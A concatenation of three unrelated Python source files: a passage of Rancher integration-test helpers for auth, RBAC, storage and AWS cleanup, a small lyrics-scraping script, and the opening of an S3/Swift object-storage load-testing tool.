return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
This method generates test cases from an input file and return the result
that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
This methods creates a new service account to validate the permissions
both before and after creating the cluster role binding between the
service account and the cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Deployed")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app["metadata"]["name"] == app_name:
if app["status"]["summary"]["state"] == "deployed":
return app_list
app = client.list_catalog_cattle_io_app()
return
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
list all installed apps. search for "app_name" in the list
if app_name is NOT in list, indicates the app has been uninstalled successfully
:param client: cluster client for the user
:param app_name: app which is being unstalled
:param timeout: time for app to be uninstalled
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Uninstalled")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app_name not in app_list:
return app_list
app = client.list_catalog_cattle_io_app()
return
def check_v2_app_and_uninstall(client, chart_name):
app = client.list_catalog_cattle_io_app()
for app in app["data"]:
if app["metadata"]["name"] == chart_name:
response = client.action(obj=app, action_name="uninstall")
app_list = wait_until_app_v2_uninstall(client, chart_name)
assert chart_name not in app_list, \
"App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
|
gather.py
|
import argparse
import os
import urllib2
import re
import codecs
from threading import Thread
from HTMLParser import HTMLParser
DOMAIN = "songmeanings.com/"
ARTIST_PATH = 'artist/view/songs/'
def start_new_thread(task, arg):
thread = Thread(target=task, args=(arg,))
thread.start()
def write_to_file(path, data):
output_file = codecs.open(path, 'a', 'utf_8')
output_file.write(data.encode('utf-8'))
output_file.write("\n")
output_file.close()
def get_url(path, arg = ""):
return 'http://' + DOMAIN + path + arg
def get_page_content(url):
response = urllib2.urlopen(url)
return response.read()
class SongPageParser(HTMLParser):
record = False
lyrics = ""
output_path = ""
def handle_starttag(self, tag, attrs):
for attr in attrs:
if attr[0] == "class" and attr[1].find('lyric-box') != -1:
self.record = True
if attr[0] == "id" and attr[1].find('lyrics-edit') != -1:
self.record = False
write_to_file(self.output_path, self.lyrics)
self.lyrics = ""
def handle_data(self, data):
if self.record:
self.lyrics += re.sub(r'[^\x00-\x7F]+', '\'', data.lstrip()) + "\n"
class ArtistPageParser(HTMLParser):
match = 0
url = ""
title = ""
output_path = ""
def handle_starttag(self, tag, attrs):
href = None
for attr in attrs:
if attr[0] == "id" and attr[1].find('lyric-') != -1:
self.match += 1
if attr[0] == "href" and attr[1].find(DOMAIN) != -1:
self.match += 1
href = attr[1]
if self.match > 1 and href is not None:
self.url = href[href.find(DOMAIN) + len(DOMAIN):]
def handle_endtag(self, tag):
self.match = 0
def handle_data(self, data):
if self.match > 1:
self.title = data
html = get_page_content(get_url(self.url))
song_parser = SongPageParser()
song_parser.output_path = self.output_path
start_new_thread(song_parser.feed, html)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--output_file', type=str, required=True)
parser.add_argument('--artists', type=str, required=True)
args = parser.parse_args()
output_file = args.output_file
artists = args.artists.replace(' ', '').split(',')
try:
os.remove(output_file)
except OSError:
print "The output file doesn't exist, creating it"
print "Gathering lyrics..."
for i, artist in enumerate(artists):
html = get_page_content(get_url(ARTIST_PATH, artist))
artist_parser = ArtistPageParser()
artist_parser.output_path = output_file
artist_parser.feed(html)
print "Progress: {}%".format(((i + 1) * 100) / len(artists))
print "Lyrics saved in {}".format(output_file)
if __name__ == "__main__":
main()
|
run.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import sys
import os
import time
import math
import random
import logging
import logging.config
import datetime
import hashlib
import base64
import multiprocessing
import results
import Util
import s3PyCmd
import myLib.cloghandler
class User:
doc = """
This is user class
"""
def __init__(self, username, ak, sk):
self.username = username
self.ak = ak
self.sk = sk
def read_config(config_file='config.dat'):
"""
:rtype : None
:param config_file: string
"""
try:
f = open(config_file, 'r')
lines = f.readlines()
for line in lines:
line = line.strip()
if line and line[0] != '#':
CONFIG[line[:line.find('=')].strip()] = line[line.find('=') + 1:].strip()
else:
continue
f.close()
CONFIG['OSCs'] = CONFIG['OSCs'].replace(' ', '').replace(',,', ',')
if CONFIG['OSCs'][-1:] == ',':
CONFIG['OSCs'] = CONFIG['OSCs'][:-1]
if CONFIG['IsHTTPs'].lower() == 'true':
CONFIG['IsHTTPs'] = True
else:
CONFIG['IsHTTPs'] = False
CONFIG['ConnectTimeout'] = int(CONFIG['ConnectTimeout'])
if int(CONFIG['ConnectTimeout']) < 5:
CONFIG['ConnectTimeout'] = 5
if CONFIG['LongConnection'].lower() == 'true':
CONFIG['LongConnection'] = True
else:
CONFIG['LongConnection'] = False
if CONFIG['UseDomainName'].lower() == 'true':
CONFIG['UseDomainName'] = True
# 如果使用域名,则OSCs为域名
CONFIG['OSCs'] = CONFIG['DomainName']
else:
CONFIG['UseDomainName'] = False
if CONFIG['VirtualHost'].lower() == 'true':
CONFIG['VirtualHost'] = True
else:
CONFIG['VirtualHost'] = False
if CONFIG['ObjectLexical'].lower() == 'true':
CONFIG['ObjectLexical'] = True
else:
CONFIG['ObjectLexical'] = False
if CONFIG['CalHashMD5'].lower() == 'true':
CONFIG['CalHashMD5'] = True
else:
CONFIG['CalHashMD5'] = False
CONFIG['Testcase'] = int(CONFIG['Testcase'])
CONFIG['Users'] = int(CONFIG['Users'])
CONFIG['UserStartIndex'] = int(CONFIG['UserStartIndex'])
CONFIG['ThreadsPerUser'] = int(CONFIG['ThreadsPerUser'])
CONFIG['Threads'] = CONFIG['Users'] * CONFIG['ThreadsPerUser']
CONFIG['RequestsPerThread'] = int(CONFIG['RequestsPerThread'])
CONFIG['BucketsPerUser'] = int(CONFIG['BucketsPerUser'])
if CONFIG['copyDstObjFiexed'] and '/' not in CONFIG['copyDstObjFiexed']:
CONFIG['copyDstObjFiexed'] = ''
if CONFIG['copySrcObjFixed'] and '/' not in CONFIG['copySrcObjFixed']:
CONFIG['copySrcObjFixed'] = ''
CONFIG['ObjectsPerBucketPerThread'] = int(CONFIG['ObjectsPerBucketPerThread'])
CONFIG['DeleteObjectsPerRequest'] = int(CONFIG['DeleteObjectsPerRequest'])
CONFIG['PartsForEachUploadID'] = int(CONFIG['PartsForEachUploadID'])
if CONFIG['ConcurrentUpParts'].lower() == 'true':
CONFIG['ConcurrentUpParts'] = True
if CONFIG['PartsForEachUploadID'] % CONFIG['ThreadsPerUser']:
if CONFIG['PartsForEachUploadID'] < CONFIG['ThreadsPerUser']:
CONFIG['PartsForEachUploadID'] = CONFIG['ThreadsPerUser']
else:
CONFIG['PartsForEachUploadID'] = int(
round(1.0 * CONFIG['PartsForEachUploadID'] / CONFIG['ThreadsPerUser']) * CONFIG[
'ThreadsPerUser'])
logging.info('change PartsForEachUploadID to %d' % CONFIG['PartsForEachUploadID'])
else:
CONFIG['ConcurrentUpParts'] = False
CONFIG['PutTimesForOneObj'] = int(CONFIG['PutTimesForOneObj'])
CONFIG['MixLoopCount'] = int(CONFIG['MixLoopCount'])
if CONFIG['RunSeconds']:
CONFIG['RunSeconds'] = int(CONFIG['RunSeconds'])
if CONFIG['RecordDetails'].lower() == 'true':
CONFIG['RecordDetails'] = True
else:
CONFIG['RecordDetails'] = False
CONFIG['StatisticsInterval'] = int(CONFIG['StatisticsInterval'])
if CONFIG['BadRequestCounted'].lower() == 'true':
CONFIG['BadRequestCounted'] = True
else:
CONFIG['BadRequestCounted'] = False
if CONFIG['AvoidSinBkOp'].lower() == 'true':
CONFIG['AvoidSinBkOp'] = True
else:
CONFIG['AvoidSinBkOp'] = False
if CONFIG['PrintProgress'].lower() == 'true':
CONFIG['PrintProgress'] = True
else:
CONFIG['PrintProgress'] = False
if not ('processID' in CONFIG['ObjectNamePartten'] and 'ObjectNamePrefix' in CONFIG[
'ObjectNamePartten'] and 'Index' in CONFIG['ObjectNamePartten']):
raise Exception('both of processID,Index,ObjectNamePartten should be in config ObjectNamePartten')
except Exception, e:
print '[ERROR] Read config file %s error: %s' % (config_file, e)
sys.exit()
def read_users():
"""
load users.dat
"""
global USERS, CONFIG
index = -1
try:
with open('./users.dat', 'r') as fd:
for line in fd:
if not line:
continue
index += 1
if index >= CONFIG['UserStartIndex'] and len(USERS) <= CONFIG['Users']:
user_info = line.strip()
user = User(user_info.split(',')[0], user_info.split(',')[1], user_info.split(',')[2])
USERS.append(user)
fd.close()
logging.debug("load user file end")
except Exception, data:
print "\033[1;31;40m[ERROR]\033[0m Load users Error, check file users.dat. Use iamPyTool.py to create users [%r]" % (
data)
logging.error(
'Load users Error, check file users.dat. Use iamPyTool.py to create users')
sys.exit()
def list_user_buckets(process_id, user, conn, result_queue):
request_type = 'ListUserBuckets'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
i = 0
while i < CONFIG['RequestsPerThread']:
i += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftlist_user_containers(process_id, user, conn, result_queue):
request_type = 'swiftListUserContainers'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
i = 0
while i < CONFIG['RequestsPerThread']:
i += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftcreate_container(process_id, user, conn, result_queue):
request_type = 'swiftCreateContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
#rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swifthead_container(process_id, user, conn, result_queue):
request_type = 'swiftHeadContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def create_bucket(process_id, user, conn, result_queue):
request_type = 'CreateBucket'
send_content = ''
if CONFIG['BucketLocation']:
send_content = '<CreateBucketConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">\
<LocationConstraint>%s</LocationConstraint></CreateBucketConfiguration >' % random.choice(
CONFIG['BucketLocation'].split(','))
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], send_content=send_content,
virtual_host=CONFIG['VirtualHost'], domain_name=CONFIG['DomainName'],
region=CONFIG['Region'])
if CONFIG['CreateWithACL']:
rest.headers['x-amz-acl'] = CONFIG['CreateWithACL']
if CONFIG['MDCPolicy']:
rest.headers['x-hws-mdc-storage-policy'] = CONFIG['MDCPolicy']
if CONFIG['StorageClass']:
rest.headers['x-default-storage-class'] = CONFIG['StorageClass']
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftlist_objects_in_container(process_id, user, conn, result_queue):
request_type = 'swiftListObjectsInContainer'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk)
rest.headers['X-auth-token'] = user.sk
rest.queryArgs['limit'] = CONFIG['Max-keys']
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i = i + 1
marker = ''
while marker != None:
rest.queryArgs['marker'] = marker
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
marker = resp.return_data
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def list_objects_in_bucket(process_id, user, conn, result_queue):
request_type = 'ListObjectsInBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['max-keys'] = CONFIG['Max-keys']
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
marker = ''
while marker is not None:
rest.queryArgs['marker'] = marker
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
marker = resp.return_data
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def head_bucket(process_id, user, conn, result_queue):
request_type = 'HeadBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_container(process_id, user, conn, result_queue):
request_type = 'swiftDeleteContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket(process_id, user, conn, result_queue):
request_type = 'DeleteBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
